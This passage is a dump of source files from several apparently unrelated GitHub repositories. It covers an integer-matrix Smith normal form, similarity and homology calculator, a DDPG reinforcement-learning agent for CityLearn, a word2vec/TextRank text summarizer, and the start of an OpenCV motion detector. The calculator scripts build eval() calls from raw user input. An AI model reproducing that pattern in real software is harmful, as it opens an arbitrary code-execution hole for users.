normal form calculator\")\r\nprint(\"\\n\")\r\nprint(\"For an integer matrix A, this program will return, in order, a tuple of\")\r\nprint(\"matrices D, U and V such that D is in Smith normal form and D=UAV for invertible U and V\")\r\nprint(\"\\n\")\r\nprint(\"Enter an integer matrix in the form of a Python list of its rows, each of which is a Python list\")\r\nprint(\"Example input: [[1,3,4],[3,-4,0],[-2,-2,6]]\")\r\nwhile 1 == 1:\r\n x=input()\r\n eval(\"print(smith(Matrix1(\"+ x +\")))\")\r\n print(\"\\n\")\r\n\r\n#this line allows the console to stay open after the first input()\r\n\r\n" }, { "alpha_fraction": 0.5465116500854492, "alphanum_fraction": 0.5755813717842102, "avg_line_length": 26.446807861328125, "blob_id": "b4c1a232b9b4feb9e8e3a9cc79bc11f91bf88d7b", "content_id": "591b65017e003f0f222ab1a348758d5e5d06feeb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2580, "license_type": "no_license", "max_line_length": 87, "num_lines": 94, "path": "/similarity.py", "repo_name": "dzinghan/smith-normal-form-calculator", "src_encoding": "UTF-8", "text": "\"\"\"\nQiu Shi Wang\nLouis Philippe Ignatieff\nJing Han Sun\n\nProgramming final project: Matrix similarity\n\"\"\"\nfrom smith import *\nfrom Matrix1 import *\n\n'''Verify if 2 matrices are similar using their Smith Normal form'''\n\ndef poly(A, x): \n '''create the characteristic polynomial and plug in the values'''\n #A = Matrix1(a)\n if A.shape[0] != A.shape[1]: #verify if it's a square matrix\n raise ValueError('matrix is not square')\n\n I = eye(A.shape[0]) #set up the identity matrix of the right size\n\n pA = A - x*I\n\n return pA\n\ndef similarity(a, b):\n A = Matrix1(a)\n B = Matrix1(b)\n if A.shape != B.shape: #verify if their sizes match\n raise ValueError('matrices are not the same size')\n elif A.shape[0] != A.shape[1] or B.shape[0] != B.shape[1]:\n raise ValueError('matrix is not square')\n\n \n valuesA = [] #smith forms of pA\n valuesB = [] #smith forms of pB\n\n #then compare if valuesA match valuesB\n\n #if 2 polynomials of degree at most n have the same values on n+1 points,\n #then they are the same polynomial\n \n n = 0 #number of test values must be at least the size of the matrix + 1\n x = -1 #to plus each value of x into A - xI starting from x = 0\n\n while n <= A.shape[0]:\n x += 1\n #choose values of x such that A - xI is not singular\n #so verify that its rank is equal to its size=\n if poly(A, x).rank() == A.shape[0] and poly(B, x).rank() == B.shape[0]:\n pA = smith(poly(A, x)) #compute the smith form for each given value of x\n #between x = 0 to x = n\n valuesA.append(pA[0])\n\n pB = smith(poly(B, x))\n valuesB.append(pB[0])\n\n n += 1\n\n return valuesA == valuesB #if this is true then it's similar\n\n\nprint(\"Matrix similarity calculator\")\nprint(\"\\n\")\nprint(\"Enter two square matrices of the same size, A and B, with a comma between them\")\nprint(\"Example input: [[-1, 6],[-2, 6]],[[3, 0], [0, 2]]\")\n\nwhile 1 == 1:\n x=input()\n tf=bool()\n E=eval(\"similarity(\"+x+\")\")\n if E==True:\n print(\"The two matrices are similar\")\n elif E==False:\n print(\"The two matrices are not similar\")\n\ninput()\n #This prevents the console from exiting after the user puts the input\n\n#------------TEST----------\n'''\nA = [[-1, 6],[-2, 6]]\nB = [[3, 0], [0, 2]]\n\nC = [[2, -1], [1, 5]]\nD = [[82, 101], [-61, -75]]\n\nE = [[5, 1, 0], [0, 5, 1], [0, 0, 6]]\nF = [[5, 0, 0], [0, 5, 1], [0, 0, 6]]\n\n\na = similarity(A, B) #they are similar\nc = similarity(C, D) #they are similar\ne = similarity(E, F) #they are not similar\n'''\n" }, { "alpha_fraction": 0.75, "alphanum_fraction": 0.75, "avg_line_length": 23.799999237060547, "blob_id": "c2a30dc46739a3b6efa19ba32f84ba9325b23e90", "content_id": "ceb7b40cbac8cca98e9ab86e8d7bea85a30b6240", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 124, "license_type": "no_license", "max_line_length": 59, "num_lines": 5, "path": "/README.md", "repo_name": "dzinghan/smith-normal-form-calculator", "src_encoding": "UTF-8", "text": "# Smith Normal Form Calculator\n\nBy Qiushi Wang, Louis Philippe Ignatieff, and Jing Han Sun.\n\nVisit documentation.pdf for information about this project.\n" }, { "alpha_fraction": 0.569327712059021, "alphanum_fraction": 0.591911792755127, "avg_line_length": 32, "blob_id": "b57bfc19d426668477ffa312674823a8f136bf63", "content_id": "bc5d14a276077fbbf7eefd4cb1fde887ecdba69b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1904, "license_type": "no_license", "max_line_length": 242, "num_lines": 56, "path": "/homology.py", "repo_name": "dzinghan/smith-normal-form-calculator", "src_encoding": "UTF-8", "text": "\"\"\"\r\nQiu Shi Wang\r\nLouis Philippe Ignatieff\r\nJing Han Sun\r\n\r\nProgramming final project: Homology of a chain complex\r\n\"\"\"\r\n\r\nfrom sympy import *\r\nfrom smith import *\r\n\r\ndef Homology(a,b):\r\n A=Matrix1(a)\r\n B=Matrix1(b)\r\n if A.shape[0]!=B.shape[1]:\r\n return (\"Matrices are of the wrong size\")\r\n elif not B*A==zeros(B.shape[0], A.shape[1]):\r\n return (\"BA!=0, not a chain complex\")\r\n k=0\r\n S=smith(A)[0] #first matrix\r\n Elemdivisors=[]\r\n for i in range(min(S.shape[0], S.shape[1])):\r\n k = S[i][i]\r\n if k!=0:\r\n Elemdivisors.append(k)\r\n answer=[\"The homology of the complex at the middle term is the direct sum of\"]\r\n if A.shape[0]-A.rank()-B.rank()!=0:\r\n answer.append(\" Z^\"+str(A.shape[0]-A.rank()-B.rank()))\r\n for i in Elemdivisors:\r\n if i!=1: \r\n answer.append(\" Z/\"+str(i))\r\n if len(answer)==1:\r\n return \"The homology of the complex at the middle term is the trivial group.\"\r\n ansstring=\"\"\r\n if len(answer)==2:\r\n return \"The homology of the complex at the middle term is\"+answer[1]+\".\"\r\n \r\n for j in range(len(answer)-1):\r\n ansstring+=answer[j]\r\n ansstring+=\" and\"\r\n ansstring+=answer[len(answer)-1]\r\n ansstring+=\".\" \r\n\r\n return ansstring\r\n\r\nprint(\"Homology calculator\")\r\nprint(\"\\n\")\r\nprint(\"For a chain complex of finitely generated free abelian groups Z^m -> Z^n -> Z^k where A:Z^m -> Z^n and B:Z^n -> Z^k are homomorphisms represented by matrices, the calculator outputs thehomology group at the middle term H=ker(B)/im(A)\")\r\nprint(\"\\n\")\r\nprint(\"Enter integer matrices A and B with a comma between them. Note that homology is only defined when BA=0.\")\r\nprint(\"Example input: [[1,2,5,4],[2,4,10,0],[1,2,5,4]], [[1,0,-1],[0,0,0]]\")\r\n\r\nwhile 1 ==1:\r\n x=input()\r\n eval(\"print(Homology(\"+x+\"))\")\r\n#This prevents the console from exiting after the user puts the input\r\n" } ]
6
NBsyxx/Extractive_Summerizer_on_Web
https://github.com/NBsyxx/Extractive_Summerizer_on_Web
f6b7ead5b0d3c9c08da54dd67fac7a5e5ffd88fa
c05dd07ed62cd32e9d9071d82d3321d00984124e
b81e6ff2373317410849d14dbc086a2e30a120e7
refs/heads/master
2022-03-02T22:09:36.940800
2019-09-29T16:11:46
2019-09-29T16:11:46
183,268,446
1
2
null
null
null
null
null
[ { "alpha_fraction": 0.5099278092384338, "alphanum_fraction": 0.5251203179359436, "avg_line_length": 30.42926788330078, "blob_id": "19181c32ac9545437ffe009865fd78011e20d8d5", "content_id": "f2092726eb1dba5613af88a467dde0535c1f5121", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6648, "license_type": "no_license", "max_line_length": 109, "num_lines": 205, "path": "/textRank.py", "repo_name": "NBsyxx/Extractive_Summerizer_on_Web", "src_encoding": "UTF-8", "text": "from gensim.models import word2vec\r\nimport math\r\nimport numpy as np\r\nfrom nltk.tokenize import word_tokenize\r\nimport time\r\n\r\n\r\ntime_start = time.time()\r\nglobal stop_word_list\r\nglobal model\r\n\r\n\r\nstop_word_list = [\"i\", \"me\", \"my\", \"myself\", \"we\", \"our\", \"ours\", \"ourselves\",\r\n \"you\", \"your\", \"yours\", \"yourself\", \"yourselves\", \"he\", \"him\",\r\n \"his\", \"himself\", \"she\", \"her\", \"hers\", \"herself\", \"it\", \"its\",\r\n \"itself\", \"they\", \"them\", \"their\", \"theirs\", \"themselves\", \"what\",\r\n \"which\", \"who\", \"whom\", \"this\", \"that\", \"these\", \"those\", \"am\", \"is\",\r\n \"are\", \"was\", \"were\", \"be\", \"been\", \"being\", \"have\", \"has\", \"had\",\r\n \"having\", \"do\", \"does\", \"did\", \"doing\", \"a\", \"an\", \"the\", \"and\", \"but\",\r\n \"if\", \"or\", \"because\", \"as\", \"until\", \"while\", \"of\", \"at\", \"by\", \"for\",\r\n \"with\", \"about\", \"against\", \"between\", \"into\", \"through\", \"during\", \"before\",\r\n \"after\", \"above\", \"below\", \"to\", \"from\", \"up\", \"down\", \"in\", \"out\", \"on\", \"off\",\r\n \"over\", \"under\", \"again\", \"further\", \"then\", \"once\", \"here\", \"there\", \"when\",\r\n \"where\", \"why\", \"how\", \"all\", \"any\", \"both\", \"each\", \"few\", \"more\", \"most\",\r\n \"other\", \"some\", \"such\", \"no\", \"nor\", \"not\", \"only\", \"own\", \"same\", \"so\", \"than\",\r\n \"too\", \"very\", \"s\", \"t\", \"can\", \"will\", \"just\", \"don\", \"should\", \"now\"]\r\n\r\n# Load the pre-trained model as global\r\nmodel = word2vec.Word2Vec.load(\"realTrained.model\")\r\n\r\n\r\ndef cut_sentences(sentence):\r\n puns = frozenset('.')\r\n tmp = []\r\n for ch in sentence:\r\n tmp.append(ch)\r\n if puns.__contains__(ch):\r\n yield ''.join(tmp)\r\n tmp = []\r\n yield ''.join(tmp)\r\n\r\n\r\ndef two_sentences_similarity(sents_1, sents_2):\r\n counter = 0\r\n for sent in sents_1:\r\n if sent in sents_2:\r\n counter += 1\r\n return counter / (math.log(len(sents_1) + len(sents_2)))\r\n\r\n\r\ndef cosine_similarity(vec1, vec2):\r\n tx = np.array(vec1)\r\n ty = np.array(vec2)\r\n cos1 = np.sum(tx * ty)\r\n cos21 = np.sqrt(sum(tx ** 2))\r\n cos22 = np.sqrt(sum(ty ** 2))\r\n cosine_value = cos1 / float(cos21 * cos22)\r\n return cosine_value\r\n\r\n\r\ndef clear_oov(sents):\r\n temp = []\r\n for word in sents[1:]:\r\n if word in model.wv.vocab:\r\n temp.append(word)\r\n return temp\r\n\r\n\r\ndef compute_similarity_by_avg(sents_1, sents_2):\r\n if len(sents_1) == 0 or len(sents_2) == 0:\r\n return 0.0\r\n sents_1 = clear_oov(sents_1)\r\n sents_2 = clear_oov(sents_2)\r\n vec1 = model[sents_1[0]]\r\n for word1 in sents_1[1:]:\r\n vec1 = vec1 + model[word1]\r\n vec2 = model[sents_2[0]]\r\n for word2 in sents_2[1:]:\r\n vec2 = vec2 + model[word2]\r\n similarity = cosine_similarity(vec1 / len(sents_1), vec2 / len(sents_2))\r\n return similarity\r\n\r\n\r\ndef calculate_score(weight_graph, scores, i):\r\n length = len(weight_graph)\r\n d = 0.85\r\n added_score = 0.0\r\n for j in range(length):\r\n denominator = 0.0\r\n fraction = weight_graph[j][i] * scores[j]\r\n for k in range(length):\r\n denominator += weight_graph[j][k]\r\n if denominator == 0:\r\n denominator = 1\r\n added_score += fraction / denominator\r\n weighted_score = (1 - d) + d * added_score\r\n return weighted_score\r\n\r\n\r\ndef weight_sentences_rank(weight_graph):\r\n scores = [0.5 for _ in range(len(weight_graph))]\r\n old_scores = [0.0 for _ in range(len(weight_graph))]\r\n while different(scores, old_scores):\r\n for i in range(len(weight_graph)):\r\n old_scores[i] = scores[i]\r\n for i in range(len(weight_graph)):\r\n scores[i] = calculate_score(weight_graph, scores, i)\r\n return scores\r\n\r\n\r\ndef different(score_1,score_2):\r\n difference = []\r\n for i in range(0, score_1.__len__()):\r\n difference.append(score_1[i]-score_2[i])\r\n sum_of_square = 0\r\n for j in difference:\r\n sum_of_square += j * j\r\n print('Difference:', sum_of_square)\r\n if sum_of_square < 0.00001:\r\n return False\r\n else:\r\n return True\r\n\r\n\r\ndef create_graph(sents):\r\n texts = len(sents)\r\n graph = {}\r\n for i in range(0,texts):\r\n temp = {}\r\n for j in range(0,texts):\r\n temp[j] = compute_similarity_by_avg(sents[i], sents[j])\r\n graph[i] = temp\r\n return graph\r\n\r\n\r\ndef filter_stop_words(sents):\r\n filtered_list = []\r\n for sent in sents:\r\n if sent not in stop_word_list:\r\n filtered_list.append(sent)\r\n return filtered_list\r\n\r\n\r\ndef summarize(text, n):\r\n tokens = cut_sentences(text)\r\n sentences = []\r\n sents = []\r\n for sent in tokens:\r\n temp = [word for word in word_tokenize(sent) if word]\r\n if temp.__len__()>= 6:\r\n sents.append(temp)\r\n sentences.append(sent)\r\n sents = filter_stop_words(sents)\r\n graph = create_graph(sents)\r\n scores = weight_sentences_rank(graph)\r\n print('----------Scores Calculated------------')\r\n print(scores)\r\n\r\n # if you want to output percentage of code, modify here!!\r\n #n = int(len(sentences)*0.2)\r\n sent_selected = nlargest(n, scores)\r\n sent_index = []\r\n for i in range(n):\r\n sent_index.append(sent_selected[i][1])\r\n sent_index.sort()\r\n print('---Sentences Returned--- with', sent_selected.__len__()/sents.__len__(),'---of the sentence kept')\r\n return [sentences[i] for i in sent_index]\r\n\r\n\r\ndef count_sentence_with_score(compare_score,scores):\r\n count = 0\r\n for score in scores:\r\n if score > compare_score:\r\n count += 1\r\n return count\r\n\r\n\r\ndef nlargest(n, iterable):\r\n rank_list = []\r\n count = 0\r\n for i in iterable:\r\n rank_list.append((i, count))\r\n count += 1\r\n rank_list.sort(key = lambda a : a[0],reverse=True)\r\n return rank_list[0:n]\r\n\r\n\r\nif __name__ == '__main__':\r\n time_start = time.time()\r\n file = open(\"input.txt\", \"r\",errors='ignore')\r\n original_text = file.read()\r\n text = original_text.replace('\\n', '')\r\n file.close()\r\n print('-----------The Original Text is:----------------------')\r\n print(original_text)\r\n print('------------------------------------------------------')\r\n\r\n num_of_sents = int(input('Number Sentences for Generated Summary?\\n'))\r\n summarize_text = summarize(text, num_of_sents)\r\n print('-----------Running-------------------------------------')\r\n\r\n for i in summarize_text:\r\n print(i)\r\n time_end = time.time()\r\n print('It takes '+str(time_end-time_start)+'s to extract Summary')\r\n" }, { "alpha_fraction": 0.698443591594696, "alphanum_fraction": 0.7276264429092407, "avg_line_length": 35.64285659790039, "blob_id": "d910e6a690c245b92943d495ec303373fd2a4643", "content_id": "894c6de6d1897098955098a9d78eda29473586a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 514, "license_type": "no_license", "max_line_length": 95, "num_lines": 14, "path": "/Continue_Training.py", "repo_name": "NBsyxx/Extractive_Summerizer_on_Web", "src_encoding": "UTF-8", "text": "from gensim.models import word2vec\nimport logging\n\n\ndef train(filename, model_name):\n model = word2vec.Word2Vec.load(model_name)\n logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)\n sentences = word2vec.LineSentence(filename, max_sentence_length=100000)\n model.train(sentences, total_examples=len(list(sentences)), epochs=15)\n model.save(model_name)\n\n\nfor i in range(0,13):\n train('Training_corpus/corpus_wiki_{}.txt'.format(str(i)),'RealTrained.model')\n\n" }, { "alpha_fraction": 0.7372262477874756, "alphanum_fraction": 0.7477696537971497, "avg_line_length": 25.12765884399414, "blob_id": "8453edf633da01f08d1d75707a3e47d1a5ad471c", "content_id": "40ae4370b31016b3996088969c903a7aaf46c92c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1233, "license_type": "no_license", "max_line_length": 120, "num_lines": 47, "path": "/README.md", "repo_name": "NBsyxx/Extractive_Summerizer_on_Web", "src_encoding": "UTF-8", "text": "# English_Extractive_Summarizer\nAn extractive summarizer for English, based on word2Vec and text rank\n\n\n\n#---------Instructions-------------\n\ngit clone \n\nmake sure the trained model is in folder.\n\n------test word2vec:---\n\n1. install gensim package by typing (Linux)\n\n>>pip3 install gensim \n\n2. type \n\n>>python3 word2vec_text.py\n\nand hit enter\n\n------- SUMMARIZER-----\n\nAutomatic summarize:\n\n1. name source text as 'input.txt', make sure it's in folder \n\n2. type\n\n>>python3 textRank.py\n\nand hit enter\n\n* for percentage output, uncomment line 160 in textRank.py\n\n\n\n#---------Development Ideas--------\n\nThis summarizer aims to extract several most important sentences in a piece of formally written English Material,\nit ranks the sentences in text and gives the most important ones.\nthe extraction is based on calculated score of each sentence in the context. The score is calculated based on textrank,\nwhich reveals the connectivity among sentences. The connection between sentences is evaluated using the cosine\nsimilarities. Each sentence receives votes (connections with othersentences) and get a calculated score round by round, \nwhen the score of each sentence is no longer changing, we will output the ranked sentences. \n\n\n\n\n" }, { "alpha_fraction": 0.6927083134651184, "alphanum_fraction": 0.7526041865348816, "avg_line_length": 46.375, "blob_id": "1b40ac102c2d442fcece4649aaff6ba52e602fd1", "content_id": "50bf1fd81757ab7f22bcebea8343b8abf340839c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 384, "license_type": "no_license", "max_line_length": 103, "num_lines": 8, "path": "/word2vecModelTrainer.py", "repo_name": "NBsyxx/Extractive_Summerizer_on_Web", "src_encoding": "UTF-8", "text": "from gensim.models import word2vec\nimport logging\n\n\nlogging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)\nsentences = word2vec.LineSentence('Training_corpus/corpus_wiki_0.txt', max_sentence_length=100000)\nmodel = word2vec.Word2Vec(sentences, size=200, window=10, min_count=10, sg=1, hs=1, iter=15, workers=8)\nmodel.save('RealTrained.model')\n\n\n\n\n\n" }, { "alpha_fraction": 0.6660839319229126, "alphanum_fraction": 0.6818181872367859, "avg_line_length": 22.875, "blob_id": "bfee2537904e2304d69a10d1f40880fcc0208c5a", "content_id": "ef8a1157924f58c14e37d24ab94341eee71514d0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 572, "license_type": "no_license", "max_line_length": 61, "num_lines": 24, "path": "/word2vec_test.py", "repo_name": "NBsyxx/Extractive_Summerizer_on_Web", "src_encoding": "UTF-8", "text": "from gensim.models import word2vec\nimport gensim.downloader as api\n\n\ndef print_closest_words(word):\n print(\"\\nWords close to \" + word)\n result = model.most_similar(word)\n for each in result:\n print(each[0], each[1])\n\n\n\nmodel = word2vec.Word2Vec.load(\"realTrained.model\")\nprint_closest_words('overwatch')\nprint_closest_words('Tracer')\nprint('\\n')\n\nresult = model.most_similar(positive=['light','electricity'])\nfor i in result:\n print(i[0],i[1])\nprint('\\n')\nresult = model.most_similar(positive=['fire','work','man'])\nfor i in result:\n print(i[0],i[1])" } ]
5
canteli/CityLearn
https://github.com/canteli/CityLearn
38dddbf07351767d8face9ad930b85bf09cf526f
e266951e3fd064e6eb01b7ae852d533300d952c0
e2bd2b287b63a1aa3e37647bc872b402bbb22600
refs/heads/master
2020-08-10T09:29:37.080828
2019-10-11T06:34:52
2019-10-11T06:34:52
214,316,558
0
0
MIT
2019-10-11T01:23:09
2019-10-09T14:07:44
2019-10-09T00:47:58
null
[ { "alpha_fraction": 0.5138514041900635, "alphanum_fraction": 0.5257849097251892, "avg_line_length": 37.46994400024414, "blob_id": "df02253bcf7a1154fecd98a304a0f3629a852f12", "content_id": "b9cfa9f6950267930cf2e74de4cd315b66f9bebd", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7039, "license_type": "permissive", "max_line_length": 207, "num_lines": 183, "path": "/agent.py", "repo_name": "canteli/CityLearn", "src_encoding": "UTF-8", "text": "import torch\nimport torch.optim as optim\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport collections\nimport numpy as np\nimport random\nimport copy\n\nclass DDPGActor(nn.Module):\n def __init__(self, obs_size, act_size):\n super(DDPGActor, self).__init__()\n\n self.net = nn.Sequential(\n nn.Linear(obs_size, 4),\n nn.ReLU(),\n nn.Linear(4, 4),\n nn.ReLU(),\n nn.Linear(4, act_size),\n nn.Tanh()\n )\n\n def forward(self, x):\n return self.net(x)\n\nclass DDPGCritic(nn.Module):\n def __init__(self, obs_size, act_size):\n super(DDPGCritic, self).__init__()\n\n self.obs_net = nn.Sequential(\n nn.Linear(obs_size, 8),\n nn.ReLU(),\n )\n\n self.out_net = nn.Sequential(\n nn.Linear(8 + act_size, 6),\n nn.ReLU(),\n nn.Linear(6, 1)\n )\n\n def forward(self, x, a):\n obs = self.obs_net(x)\n return self.out_net(torch.cat([obs, a], dim=1))\n \nclass TargetNet:\n \"\"\"\n Wrapper around model which provides copy of it instead of trained weights\n \"\"\"\n def __init__(self, model):\n self.model = model\n self.target_model = copy.deepcopy(model)\n\n def sync(self):\n self.target_model.load_state_dict(self.model.state_dict())\n\n def alpha_sync(self, alpha):\n \"\"\"\n Blend params of target net with params from the model\n :param alpha:\n \"\"\"\n assert isinstance(alpha, float)\n assert 0.0 < alpha <= 1.0\n state = self.model.state_dict()\n tgt_state = self.target_model.state_dict()\n for k, v in state.items():\n tgt_state[k] = tgt_state[k] * alpha + (1 - alpha) * v\n self.target_model.load_state_dict(tgt_state)\n \n \nclass Batch:\n def __init__(self):\n self.batch = []\n \n def append_sample(self, sample):\n self.batch.append(sample)\n \n def sample(self, sample_size):\n s, a, r, s_next = [],[],[],[]\n \n if sample_size > len(self.batch):\n sample_size = len(self.batch)\n \n rand_sample = random.sample(self.batch, sample_size)\n for values in rand_sample:\n s.append(values[0])\n a.append(values[1])\n r.append(values[2])\n s_next.append(values[3])\n return torch.tensor(s,dtype=torch.float32), torch.tensor(a,dtype=torch.float32), torch.tensor(r,dtype=torch.float32), torch.tensor(s_next,dtype=torch.float32)\n \n def __len__(self):\n return len(self.batch)\n \n \nclass RL_Agents:\n def __init__(self, observation_spaces = None, action_spaces = None):\n self.device = \"cpu\"\n self.epsilon = 1.2\n self.n_buildings = len(observation_spaces)\n self.batch = {}\n self.frame_idx = {}\n for i in range(len(observation_spaces)):\n self.batch[i] = Batch()\n \n LEARNING_RATE_ACTOR = 1e-4\n LEARNING_RATE_CRITIC = 1e-3\n self.MIN_REPLAY_MEMORY = 100\n self.BATCH_SIZE = 2400\n self.EPOCHS = 6\n self.GAMMA = 0.99\n self.EPSILON_FINAL = 0.01\n self.EPSILON_START = 1.2\n self.EPSILON_DECAY_LAST_FRAME = 5000\n self.hour_idx = 0\n \n i = 0\n self.act_net, self.crt_net, self.tgt_act_net, self.tgt_crt_net, self.act_opt, self.crt_opt = {}, {}, {}, {}, {}, {}\n for o, a in zip(observation_spaces, action_spaces):\n self.act_net[i] = DDPGActor(o.shape[0], a.shape[0]).to(self.device)\n self.crt_net[i] = DDPGCritic(o.shape[0], a.shape[0]).to(self.device)\n self.tgt_act_net[i] = TargetNet(self.act_net[i])\n self.tgt_crt_net[i] = TargetNet(self.crt_net[i])\n self.act_opt[i] = optim.Adam(self.act_net[i].parameters(), lr=LEARNING_RATE_ACTOR)\n self.crt_opt[i] = optim.Adam(self.crt_net[i].parameters(), lr=LEARNING_RATE_CRITIC)\n i += 1\n \n def select_action(self, states):\n i, actions = 0, []\n for state in states:\n a = 0.5*self.act_net[i](torch.tensor(state))\n a = a.cpu().detach().numpy() + self.epsilon * 0.5 * np.random.normal(size=a.shape)\n a = np.clip(a, -0.5, 0.5)\n actions.append(a)\n i += 1\n return actions\n \n def add_to_batch(self, states, actions, rewards, next_states):\n i = 0\n for s, a, r, s_next in zip(states, actions, rewards, next_states):\n self.batch[i].append_sample((s, a, r, s_next))\n i += 1\n \n batch, states_v, actions_v, rewards_v, dones_mask, states_next_v, q_v, last_act_v, q_last_v, q_ref_v, critic_loss_v, cur_actions_v, actor_loss_v = {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {} \n \n self.epsilon = max(self.EPSILON_FINAL, self.EPSILON_START - self.hour_idx / self.EPSILON_DECAY_LAST_FRAME)\n self.hour_idx += 1\n for i in range(self.n_buildings):\n if len(self.batch[i]) > self.MIN_REPLAY_MEMORY:\n for k in range(self.EPOCHS):\n states_v[i], actions_v[i], rewards_v[i], states_next_v[i] = self.batch[i].sample(self.BATCH_SIZE)\n\n # TRAIN CRITIC\n self.crt_opt[i].zero_grad()\n #Obtaining Q' using critic net with parameters teta_Q'\n q_v[i] = self.crt_net[i](states_v[i], actions_v[i])\n\n #Obtaining estimated optimal actions a|teta_mu from target actor net and from s_i+1.\n last_act_v[i] = self.tgt_act_net[i].target_model(states_next_v[i]) #<----- Actor to train Critic\n\n #Obtaining Q'(s_i+1, a|teta_mu) from critic net Q'\n q_last_v[i] = self.tgt_crt_net[i].target_model(states_next_v[i], last_act_v[i])\n# q_last_v[i][dones_mask[i]] = 0.0\n\n #Q_target used to train critic net Q'\n q_ref_v[i] = rewards_v[i].unsqueeze(dim=-1) + q_last_v[i] * self.GAMMA\n critic_loss_v[i] = F.mse_loss(q_v[i], q_ref_v[i].detach())\n critic_loss_v[i].backward()\n self.crt_opt[i].step()\n\n # TRAIN ACTOR\n self.act_opt[i].zero_grad()\n #Obtaining estimated optimal current actions a|teta_mu from actor net and from s_i\n cur_actions_v[i] = self.act_net[i](states_v[i])\n\n #Actor loss = mean{ -Q_i'(s_i, a|teta_mu) }\n actor_loss_v[i] = -self.crt_net[i](states_v[i], cur_actions_v[i]) #<----- Critic to train Actor\n actor_loss_v[i] = actor_loss_v[i].mean()\n #Find gradient of the loss and backpropagate to perform the updates of teta_mu\n actor_loss_v[i].backward()\n self.act_opt[i].step()\n\n self.tgt_act_net[i].alpha_sync(alpha=1 - 0.1)\n self.tgt_crt_net[i].alpha_sync(alpha=1 - 0.1)" }, { "alpha_fraction": 0.5636363625526428, "alphanum_fraction": 0.5727272629737854, "avg_line_length": 9, "blob_id": "ebcf105293838e02dc8a8e3dac93f8c869416dc6", "content_id": "5b9716e760b8ed7495d13413daaa88d81f888abd", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": true, "language": "reStructuredText", "length_bytes": 110, "license_type": "permissive", "max_line_length": 16, "num_lines": 11, "path": "/docs/_build/html/_sources/modules.rst.txt", "repo_name": "canteli/CityLearn", "src_encoding": "UTF-8", "text": "CityLearn\n=========\n\n.. toctree::\n :maxdepth: 4\n\n agents\n citylearn\n common\n energy_models\n model\n" } ]
2
matmss/pycomputervisionAI
https://github.com/matmss/pycomputervisionAI
79a7c03f52b9e4b34409b667ee95f350bad82996
c1855184e9efd97060396f61c1715e2bc2883bc9
8089e57a9bc381c22aad1105dbae9c166b6e7e47
refs/heads/master
2021-05-20T11:30:17.723350
2020-07-01T20:42:39
2020-07-01T20:42:39
252,257,909
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6428571343421936, "alphanum_fraction": 0.7857142686843872, "avg_line_length": 27, "blob_id": "33004c2d8a025fb8a60ab5a748bfa3ff82fa1092", "content_id": "e699e7b2283d06af28fcb428b1c8d59c870789d0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 28, "license_type": "permissive", "max_line_length": 27, "num_lines": 1, "path": "/alwaysai/realtime_object_detector/Dockerfile", "repo_name": "matmss/pycomputervisionAI", "src_encoding": "UTF-8", "text": "FROM alwaysai/edgeiq:0.13.0\n" }, { "alpha_fraction": 0.5776465535163879, "alphanum_fraction": 0.5942694544792175, "avg_line_length": 40.563636779785156, "blob_id": "3380a639e27cc51553447fadc24f6d8f40d48572", "content_id": "36f05842004b80cec4bc61507bf098f1014c239c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4572, "license_type": "permissive", "max_line_length": 128, "num_lines": 110, "path": "/detect1.txt", "repo_name": "matmss/pycomputervisionAI", "src_encoding": "UTF-8", "text": "import cv2.cv as cv\nfrom datetime import datetime\nimport time\n\nclass MotionDetector():\n\n def onChange(self, val): #callback when the user change the ceil\n self.ceil = val\n\n def __init__(self,ceil=8, doRecord=True, showWindows=True):\n self.writer = None\n self.font = None\n self.doRecord=doRecord #Either or not record the moving object\n self.show = showWindows #Either or not show the 2 windows\n self.frame = None\n\n self.capture=cv.CaptureFromCAM(0)\n self.frame = cv.QueryFrame(self.capture) #Take a frame to init recorder\n if doRecord:\n self.initRecorder()\n\n self.frame1gray = cv.CreateMat(self.frame.height, self.frame.width, cv.CV_8U) #Gray frame at t-1\n cv.CvtColor(self.frame, self.frame1gray, cv.CV_RGB2GRAY)\n\n #Will hold the thresholded result\n self.res = cv.CreateMat(self.frame.height, self.frame.width, cv.CV_8U)\n\n self.frame2gray = cv.CreateMat(self.frame.height, self.frame.width, cv.CV_8U) #Gray frame at t\n\n self.width = self.frame.width\n self.height = self.frame.height\n self.nb_pixels = self.width * self.height\n self.ceil = ceil\n self.isRecording = False\n self.trigger_time = 0 #Hold timestamp of the last detection\n\n if showWindows:\n cv.NamedWindow(\"Image\")\n cv.CreateTrackbar(\"Mytrack\", \"Image\", self.ceil, 100, self.onChange)\n\n def initRecorder(self): #Create the recorder\n codec = cv.CV_FOURCC('D', 'I', 'V', 'X')\n #codec = cv.CV_FOURCC(\"D\", \"I\", \"B\", \" \")\n self.writer=cv.CreateVideoWriter(datetime.now().strftime(\"%b-%d_%H:%M:%S\")+\".avi\", codec, 15, cv.GetSize(self.frame), 1)\n #FPS set at 15 because it seems to be the fps of my cam but should be ajusted to your needs\n self.font = cv.InitFont(cv.CV_FONT_HERSHEY_SIMPLEX, 1, 1, 0, 2, 8) #Creates a font\n\n def run(self):\n started = time.time()\n while True:\n\n curframe = cv.QueryFrame(self.capture)\n instant = time.time() #Get timestamp o the frame\n\n self.processImage(curframe) #Process the image\n\n if not self.isRecording:\n if self.somethingHasMoved():\n self.trigger_time = instant #Update the trigger_time\n if instant > started +5:#Wait 5 second after the webcam start for luminosity 